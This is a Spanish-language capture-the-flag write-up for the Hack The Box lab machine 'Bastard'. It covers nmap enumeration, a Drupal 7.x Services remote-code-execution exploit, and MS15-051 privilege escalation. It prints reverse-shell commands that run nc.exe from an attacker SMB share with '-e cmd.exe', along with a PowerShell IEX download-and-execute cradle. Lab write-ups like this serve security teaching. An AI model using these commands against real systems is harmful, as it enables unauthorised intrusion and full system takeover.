Bastard

https://app.hackthebox.com/machines/7

Reconocimiento

# Nmap 7.94SVN scan initiated Sat Sep 21 11:11:25 2024 as: nmap -p135,49154,80 -sCV -T5 -oN Targeted 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.052s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-title: Welcome to Bastard | Bastard
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-generator: Drupal 7 (http://drupal.org)
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Explotación

Viendo el reporte de nmap me fijo en que hay una ruta muy interesante, changelog.txt en esta ruta suele haber filtraciones de versiones las cuales como auditor rd una información muy importante.

Al meternos en la web vemos que es un Drupal, y al entrar en el Path http://10.10.10.9/CHANGELOG.txt podemos encontrar que esta la versión del Drupal filtrada.

Buscando en google "Drupal 7.54 exploitdb" encontramos el siguiente exploit:

Drupal 7.x Module Services - Remote Code ExecutionExploit Database

searchsploit -m 41564

Una vez descargado nos metemos dentro de el exploit para ver como funciona y dentro de el exploit veo unos parámetros que no funcionan:

En primer lugar obviamente cambio:

$url = 'http://vmweb.lan/drupal-7.54';
$url = 'http://10.10.10.9';

También me doy cuenta que la ruta $endpoint_path = '/rest_endpoint'; no existe así que probando encuentro que la ruta /rest si existe y la cambio en data pongo el payload que siempre suelo poner para no tener confusión y quedaría algo como esto:

Una vez ejecutado me da la url donde se ha subido el archivo:

y al comprobarlo, tenemos ejecución remota de comandos:

una vez estemos en esta situación haremos lo siguiente para conseguir la reverse shell:

Primero de todo tener en la ruta donde vamos a abrir el smb server un nc.exe

• Primero nos abriremos una servidor smb con el siguiente comando:

impacket-smbserver pwned . -smb2supportpython

• A la misma vez abriremos un puerto por el cual queremos que entre la reverse shell:

rlwrap nc -nlvp 443

y en la ejecución remota de comandos pondremos lo siguiente para conseguirla

\\10.10.14.13\pwned\nc.exe -e cmd.exe <miIP> 443

y ya conseguiríamos la reverse shell.

Escalada de Privilegios

Para esta escalada de privilegios vamos a utilizar la herramienta Sherlok.ps1

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/refs/heads/master/Sherlock.ps1

Debajo del todo de Sherlock.ps1 tenemos que poner Find-AllVulns:

# Abrimos un el puerto 80
python3 -m http.server
# Ejecutamos en la maquina
powershell IEX(New-Object Net.WebClient).downloadString('http://<miIp>/Sherlock.ps1')

Sherlock.ps1 nos va a decir que vulnerabilidades de escalada de privilegios tiene la máquina en este caso encontramos esta vulnerabilidad:

así que vamos a buscar un exploit relacionado: https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

Una vez con el exploit y nc.exe en nuestro directorio de trabajo es tan simple como abrir un servidor smb y otro servidor por el puerto 4444 y ejecutar el siguiente comando dentro de la máquina.

\\10.10.14.13\pwned\ms15-051x64.exe "\\10.10.14.13\pwned\nc.exe -e cmd.exe 10.10.14.13 4444"